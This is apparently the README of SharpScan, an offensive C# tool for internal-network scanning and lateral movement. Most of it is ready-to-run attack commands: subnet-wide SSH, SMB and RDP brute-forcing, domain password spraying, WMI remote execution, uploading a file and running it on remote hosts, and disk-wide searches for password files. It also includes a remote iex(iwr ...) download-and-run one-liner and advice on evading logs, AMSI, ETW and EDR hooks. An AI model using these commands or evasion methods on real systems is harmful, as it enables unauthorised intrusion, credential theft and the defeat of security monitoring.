SharpScan
如果您觉得项目还不错的话,请给我一颗免费的星星,非常感谢!
1.特点
- C#开发的内网资产扫描器,方便内网横向移动和域内信息收集
- 参考了Ladon,Fscan、Kscan等扫描器的工作原理
- 为了兼容更古老的系统,所以采用.NET Framework3.5和.NET Core6.0开发
- 使用异步和高梯度、扫描速度快且可控、内存自动恢复
- 使用Inline-assemble或者Execute-assemble进行内存加载,实现无文件实现扫描
- 体积较小(目前800kb)、传输快、自动化扫描+内网信息收集一条龙
- 尽量遵循OPSEC原则,不创建net.exe、wmi.exe、reg.exe等额外的子进程记录,减少日志记录
2. 主要功能
- 存在探测(Icmp、Arp)
- 端口扫描(Tcp)、主机信息探测、目标探测探测
- 支持NetBios(默认快速137端口)、SMB(默认445端口)和WMI(默认135端口)服务探测
- 高危漏洞扫描:Eternal Blue(ms17010)、SMBGhost(CVE-2020-0796)、ZeroLogon(CVE-2020-1472)
- 网页标题探测,指纹识别常见CMS、OA框架
- 各类服务弱口令爆破、账号密码爆破(SSH、SMB、RDP、FTP),SSH命令执行
- 探测当前主机.NET版本、操作系统版本信息、杀毒软件/内网设备(AV/EDR/XDR)查询
- 导出本地RDP登录日志(Rdp端口、Mstsc日志、Cmdkey日志、登录成功、失败日志)
- 判断是否在域内、定位域控IP、信息收集域控的FQDN、域管理员组、域企业管理员组、LDAP查询、域内用户名枚举,密码喷洒(全自动化)
- 全盘文件搜索,关键词匹配,与一切的功能本相似,适合全盘搜索密码(静默搜索、不占用内存)
- 携带一个Socks5代理服务器,支持账号密码验证、支持Tcp/IP端口复用
- 通过Sharpwmi进行内网横向移动,支持文件上传、命令执行(文件上传大小不超过512kb)
- 将扫描结果导出为txt、md文档
3.可能性
- Windows:支持win7-win11,windows server2008-2022
- Linux:支持glibc 2.17以上的系统
- MacOS:arm x64_x86,intel_x64_86(macOS 10.15以上)
4.使用
Usage: SharpScan [OPTIONS]
Options:
-i, --icmp Perform icmp scan
-a, --arp Perform arp scan
-U, --udp Perform udp scan
-h, --hTarget=VALUE Target segment to scan
-p, --ports=VALUE Ports to scan (e.g. "0-1024" or "80,443,8080")
-u, --username=VALUE Username for authentication
--pw, --password=VALUE Password for authentication
--uf, --ufile=VALUE Username file for authentication
--pwf, --pwdfile=VALUE Password file for authentication
-m, --mode=VALUE Mode(e.g. ssh/smb/rdp/ftp/wmiexec/dcom/mysql/mssql/
userenum/passwordspray)
-f, --func=VALUE wmiexc function(cmd/psh/upload/uploadexec)
-c, --command=VALUE Command Execution
-d, --delay=VALUE Scan delay(ms),Defalt:10ms
-t, --thread=VALUE Maximum num of concurrent scans,Defalt:600
-s, --search=VALUE Search all files
-l, --localfile=VALUE The local file to upload
-r, --remotefile=VALUE The remote file path
--socks5=VALUE Open socks5 port
--http=VALUE Open SimpleHTTPServer port
--folder=VALUE SimpleHTTPServer Folder
--nopoc Not using proof of concept(POC)
-o, --output=VALUE Output file to save console output
--help, --show Show this usage and help
Example:
SharpScan.exe -help
SharpScan.exe -h 192.168.1.1/24
SharpScan.exe -h C:\ip.txt
SharpScan.exe -h 192.168.1.1,192.168.1.3,192.168.1.4
SharpScan.exe -h 192.168.1.107 -p 100-1024
4.1基本用法
扫描C段/B段,默认使用所有模块
SharpScan.exe -h 192.168.1.1/24 (扫描C段)
SharpScan.exe -h 192.168.1.1/16 (扫描B段)
SharpScan.exe -h 192.168.1.107,192.168.1.3,192.168.1.4 (扫描指定IP,用逗号分隔)
SharpScan.exe -h C:\\Windows\\IP.txt (扫描指定IP.txt,格式和账号密码本的格式一样)
SharpScan.exe -h 192.168.1.107 -p 100-1024 (对单个IP进行端口扫描)
4.2其它功能
SharpScan.exe -h 192.168.244.1/24 -nopoc (只做网段主机探测和端口扫描)
SharpScan.exe -s 192.168.244.169 -p 80-1024 -d 0 -m 600 (Tcp端口扫描:80-1024,0延时,最大并发600)
SharpScan.exe -t 192.168.244.141 -U -p 100-10000 (udp端口扫描:100-10000,10ms延时,最大并发600)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a (C段ssh服务账号密码爆破,账号root,密码a)
SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a (C段smb服务账号密码爆破,账号administrator,密码a)
SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a (C段rdp服务账号密码爆破,账号administrator,密码a)
SharpScan.exe -h 192.168.244.1/24 -m smb -uf user.txt -pwf pass.txt (用账号密码本爆破C段的smb服务)
SharpScan.exe -h 192.168.244.1/24 -m rdp -uf user.txt -pwf pass.txt (用账号密码本爆破C段的rdp服务)
SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt (用账号密码本爆破C段的ssh服务()
SharpScan.exe -h 192.168.244.1/24 -m ms17010 (C段批量扫描是否存在ms17010)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname-a" (ssh命令执行C段枚举)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\\Windows" (远程执行命令,通过注册表传递数据)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func upload -l C:\a.exe -r C:\\Windows\a.exe (上传文件到远程主机,-l是本地文件路径,-r是上传到远程主机的文件路径)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func uploadexec -l C:\a.exe -r C:\\Windows\a.exe (上传文件到远程主机并且执行文件)
SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt (域内枚举用户名)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pw abc123$% (域内密码喷洒)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pwf pass.txt(域内密码喷洒)
SharpScan.exe -s "pass.txt" (全盘静默检索pass.txt)
SharpScan.exe -socks5 8000 -u test -pw 1234 (Socks5:8000,用户名:test,密码:1234)
SharpScan.exe -h 192.168.244.1/24 -o output.txt (将扫描结果导出到output.txt)
4.3视频演示
演示.mp4
4.4截图
閱讀
扫描指定IP(默认使用TCP),端口范围10-1024,0延迟,最大梯度600,用时3秒
SharpScan.exe -s 192.168.244.169 -p 10-1024 -d 0 -m 600
使用UDP协议传输端口,端口范围100-10000,延迟10ms,最大梯度600,用时21秒
SharpScan.exe -t 192.168.244.141 -U -p 100-10000
RDP爆炸
C段RDP服务账号密码爆破
SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a
SSH爆破
C段SSH服务账号密码爆破
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a
SSH 命令执行
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname -a"
SMB爆炸
C段爆破SMB账号密码爆破:
SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a
账号密码本爆破
SSH、SMB、RDP都是相同的
SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt
全盘搜索
搜索本地磁盘上的pass.txt
SharpScan.exe -s "pass.txt"
Socks5代理
使用Socks5服务:在当前主机创建一个Socks5服务,端口为8000,用户名为test,密码为1234
SharpScan.exe -socks5 8000 -u test -pw 1234
在Powershell使用
您可以将C#程序轻松转为powershell脚本:Invoke-SharpScan
Import-Module .\Invoke-SharpScan.ps1
Invoke-SharpScan -Command "-h 192.168.244.1/24"
远程加载powershell
iex(iwr -UseBasicParsing https://raw.githubusercontent.com/INotGreen/SharpScan/main/Powershell/Invoke-SharpScan.ps1);Invoke-SharpScan -Command "-h 192.168.244.1/24"
5.正在完成(TODO)
- 数据库密码爆破(mysql、mssql、redis、psql、oracle等)
- redis写全局或写计划任务
6.可能会遇到问题
1.为什么用NET Framework3.5编写程序
.NET的语法是向上兼容的,.NET Framework2.0/3.5的语法是可以在.NET Framework4、4.5、4.8中使用的,但是.NET Framework4系列的语法是无法向下兼容的,而对于一些古老的的设备、它们只安装了.NET Framework2.0/3.5。并且我在代码中添加了对.NET Framework3.5高级并行和并行的支持,3.5以后提供的Linq查询相对于.NET Framework2.0更灵活而且高效,因此用.NET Framework3.5编写的程序,代码移植性和兼容性比较强的版本。
2.NET Framework3.5不能直接在未安装.NET Framework3.5的windows10、11上运行吗?
很多人遇到这个问题,答案是可以的,通过powershell去Patch .NET的版本标识符,将v2.0.50727替换成v4.0.30319,就可以在win10上运行,上面说的.NET Framework3.5可以直接转成NET Framework4.0以上,因此只需要Patch标识符就行了
$filePath = "SharpScan.exe"
$outputFilePath = "SharpScan_Patched.exe"
$findBytes = [System.Text.Encoding]::ASCII.GetBytes("v2.0.50727")
$replaceBytes = [System.Text.Encoding]::ASCII.GetBytes("v4.0.30319")
$content = [System.IO.File]::ReadAllBytes($filePath)
for ($i = 0; $i -le $content.Length - $findBytes.Length; $i++) {
$match = $true
for ($j = 0; $j -lt $findBytes.Length; $j++) {
if ($content[$i + $j] -ne $findBytes[$j]) {
$match = $false
break
}
}
if ($match) {
[Array]::Copy($replaceBytes, 0, $content, $i, $replaceBytes.Length)
}
}
[System.IO.File]::WriteAllBytes($outputFilePath, $content)
Write-Host "new exe:$outputFilePath"
根据这个思路,你可以使用ExecuteAssembly或者Inline-Assembly去加载.NET程序,只需要做到根据不同的系统来修补不同的版本,即可解决兼容性和移植性问题
3.用了内存加载,就可以不用做免杀了吗?
答案是否定的,无论是ExecuteAssembly还是Inline-Assembly,对于内核级监控的 AV/EDR/XDR,C#代码在内存中都是透明的,不过,它们对于 .NET 的监控更多的是在用户层,因此您需要考虑绕过AMSI,ETW、Ntdll钩子,Kernel32钩子等用户层的钩子,即使这看起来有些麻烦,另外您也可以尝试将C#转成Powershell脚本,通过.NET丰富的交互方法,在应用层和内存可以轻松地绕过AMSI等引擎的钩子,而对于没有接入amsi和对.NET没有自定义检测规则的EDR厂商,内存加载则可以轻松地绕过它们